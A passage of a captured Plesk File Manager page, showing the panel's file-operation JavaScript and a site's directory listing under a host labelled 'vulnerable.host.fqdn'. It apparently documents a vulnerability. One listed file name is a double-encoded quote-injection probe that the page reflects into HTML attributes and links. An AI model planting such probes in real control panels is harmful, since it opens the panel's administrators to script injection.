id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/";
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
               errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
                       errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/";
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value = "touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/";
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/";
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value = "remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/create-file/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-create-dir" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_dir_oC();return false;" style=""><BUTTON name="bname_create_dir" id="buttonid-create-dir" type="button" onClick="Event.stop(event);new_dir_oC();return false;">Add New Directory</BUTTON><SPAN id="spanid-create-dir">Add New Directory</SPAN></DIV>
           <DIV class="commonButton" id="bid-create-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new file.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_file_oC();return false;" style=""><BUTTON name="bname_create_file" id="buttonid-create-file" type="button" onClick="Event.stop(event);new_file_oC();return false;">Add New File</BUTTON><SPAN id="spanid-create-file">Add New File</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return 
false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table 
width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A 
name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort 
files and directories by size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>&nbsp;</td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();" onMouseOver="f(event, &#039;pdir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_pdir.gif" width="16" height="16" alt="file_pdir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">..</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 03:11 PM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var 
inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_App_Data" value="App_Data" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();">App_Data</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=App_Data" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2FApp_Data" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if 
(&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_css" value="css" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();">css</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=css" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fcss" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if 
(&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"></tr>
<tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_673db%2522a%253d%2522b%25226c91d8a7d6d" value="673db%2522a%253d%2522b%25226c91d8a7d6d"
onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick="return bin();;lon();">673db%2522a%253d%2522b%25226c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/673db%2522a%253d%2522b%25226c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, 
